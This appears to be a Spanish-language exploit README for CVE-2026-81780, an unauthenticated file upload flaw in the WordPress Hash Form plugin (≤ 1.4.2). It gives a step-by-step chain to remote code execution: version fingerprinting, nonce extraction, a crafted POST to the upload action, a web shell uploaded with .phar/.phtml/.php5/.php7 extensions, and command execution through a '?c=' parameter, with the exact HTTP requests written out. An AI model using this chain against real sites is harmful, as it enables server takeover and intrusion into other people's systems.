
Exploit para CVE-2026-81780: carga de archivos sin autenticación en el plugin Hash Form de WordPress que conduce a la ejecución remota de código mediante payloads PHP manipulados.
CVE-2026-81780 — Hash Form RCE
La vulnerabilidad
Carga de archivos sin autenticación en el plugin Hash Form de WordPress (≤ 1.4.2). El plugin permite la carga arbitraria de archivos sin una autenticación adecuada ni validación del tipo de archivo, lo que conduce a la Ejecución Remota de Código (RCE).
Cadena de explotación
Paso Acción 1 El atacante comprueba el plugin Hash Form mediante readme.txt 2 Extrae ajax_nounce previsualizando formularios (hashform_preview) 3 Envía una solicitud POST a hashform_file_upload_action con el payload PHP 4 Sube una web shell como .phar, .phtml, .php5 o .php7 5 Activa la shell accediendo a /wp-content/uploads/hashform/temp/v.{ext} 6 Ejecuta comandos del sistema mediante ?c=id
GET /wp-content/plugins/hash-form/readme.txt
↓
Versión detectada (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Extraer Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Subir: v.phar (o .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Comando ejecutado (uid=www-data)```